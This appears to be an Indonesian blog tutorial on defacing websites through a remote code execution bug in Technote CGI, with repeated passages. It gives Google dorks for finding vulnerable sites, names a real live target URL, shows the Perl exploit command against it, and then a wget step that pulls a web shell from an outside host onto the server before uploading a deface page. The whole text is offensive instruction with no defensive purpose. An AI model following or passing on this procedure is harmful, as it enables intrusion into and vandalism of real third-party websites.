tutorial deface RCE(REMOTE CODE EXECUTION) Technote CGI Exploit 0.4
Assalamualikum wr.wb kali ini saya akan memberikan tutorial tutorial deface RCE(REMOTE CODE EXECUTION) Technote CGI Exploit 0.4 sebenarnya ini bug sudah lama sekali,ah sudahlah ntr kalian baper baca kisahnya hehe.
-nah untuk yang belum install perl tapi sudah install xampp tinggal taruh exploit nya di \xampp\perl\bin
ok pertama kalian siapkan adalah
-kopi buat nyantai
-kond*m mana tau sesak ng*we
-udud,trus kalian buang,karena rokok membunuhmu :v
-perl,untuk cara installnya cari gugle ya gan
atau kalian bisa mengguanakan perl dari xampp,untuk cara memakai perl di xampp simak saja nanti :v
-script exploit rce
untuk dork kalian bisa pakai:
- - Google Dork 1 : inurl:/cgi-bin/technote/
- - Google Dork 2 : inurl:".cgi?board=FREE_BOARD"
- - Google Dork 3 : intext:"TECHNOTE-TOP"
pertama kalian dorking menggunakan salah satu dork di atas
pilih satu per satu website yang ada di google dork
disini saya sudah memiliki live target http://www.a-17.com/a17bd/main.cgi?board=FREE_BOARD
ok selanjutnya kalian buka terminal kesayangan kalian disini saya memakai cmder.
pilih satu per satu website yang ada di google dork
disini saya sudah memiliki live target http://www.a-17.com/a17bd/main.cgi?board=FREE_BOARD
ok selanjutnya kalian buka terminal kesayangan kalian disini saya memakai cmder.
-nah untuk yang belum install perl tapi sudah install xampp tinggal taruh exploit nya di \xampp\perl\bin
setelah itu kalian jalankan exploiter dengan command:
perl exploit.pl http://www.a-17.com/a17bd/main.cgi?board=FREE_BOARD
jika vuln maka akan muncul seperti di gambar bawah ini
selanjutnya kalian ketil ls,cd board,lalu kalian bisa melakukan wget untuk mengupload shell
example wget -O mek,php site.com/shell.txt
apa bila berhasil maka kurang lebih seperti ini
selanjutnya check shell kalian,gimana checknya? http://www.a-17.com/a17bd/board/shell.php
selanjutnya upload script deface kalian:v
perl exploit.pl http://www.a-17.com/a17bd/main.cgi?board=FREE_BOARD
jika vuln maka akan muncul seperti di gambar bawah ini
selanjutnya kalian ketil ls,cd board,lalu kalian bisa melakukan wget untuk mengupload shell
example wget -O mek,php site.com/shell.txt
apa bila berhasil maka kurang lebih seperti ini
selanjutnya upload script deface kalian:v
0 Response to "tutorial deface RCE(REMOTE CODE EXECUTION) Technote CGI Exploit 0.4 "
Posting Komentar